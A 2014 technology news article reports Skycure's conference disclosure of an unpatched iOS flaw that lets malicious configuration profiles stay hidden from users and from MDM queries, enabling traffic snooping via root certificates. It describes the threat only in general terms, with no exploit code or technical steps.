iOS Vulnerability Leaves iPhones Open To ‘Invisible Malicious Profiles’

Thomas Brewster,

Apple has not yet patched a flaw that allows for the installation of invisible malicious configuration files, which could be used to spy on users

A weakness in Apple’s iOS operating system could allow an attacker to spy on a victim’s phone and hide their illicit activity, using what are known as “invisible malicious profiles”.

In the basic threat, detailed last year, hackers trick users into downloading configuration profiles, XML files that contain settings to manage various iOS functions, including Wi-Fi and email.

But two “evolutions” of this threat were discussed by Israeli security firm Skycure at RSA 2014 conference today, one of which made the profiles invisible to the naked eye. Normally, a user can simply go to their profiles settings and delete any malicious ones, but a vulnerability in iOS could be exploited to make them invisible.

apple, snooping surveillance privacy © Dmitry Vinogradov ShutterstockThe invisible iOS threat

Yair Amit, chief technology officer and co-founder of Skycure, would not go into detail on how to exploit the flaw, other than to say Apple was working on a fix, which will likely appear in iOS 7.1. Apple had not responded to a request for comment at the time of publication.

The tech titan was told about the flaw back in September and it was hoped a patch would be issued in time for RSA 2014. But no fix has yet emerged, despite recent updates to iOS.

The threat of malicious profiles, which have been seen in attacks by genuine online criminals, could be nasty. They could be used to install root certificates on a device, allowing the attacker to snoop on content ostensibly protected by SSL encryption.

It would be feasible for a hacker to completely compromise Facebook, LinkedIn, mail and bank identities used by the target by stealing their credentials.

“We’ve seen attackers spread malicious profiles through email but also through websites. That is very effective. They impersonate legitimate services,” Amit told TechWeekEurope.

The other “evolution” of the threat involved the bypassing of mobile device management (MDM) systems, traditionally used as a protective measure against app-based attacks. Even if the ProfileList MDM command is used, in an attempt to remotely query the installed profiles on a device, the malicious configuration file remains invisible.

“Even when you use MDM to query installed profiles, you don’t see that. It looks like nothing is there, but the attack persists,” Amit said.

“An attacker could also impersonate the MDM server… because of the capabilities of MDM, as an attacker I can do some cool stuff, like query information from the device or even remotely wipe it when I want.”

The only way a user could feasibly get rid of the profile would be to reset a device to factory settings, according to Skycure.

It’s been a bad week for Apple’s security team, as it faced criticism over a nasty SSL encryption weakness that allowed hackers to easily spy on users.

Are you a security expert? Try our quiz!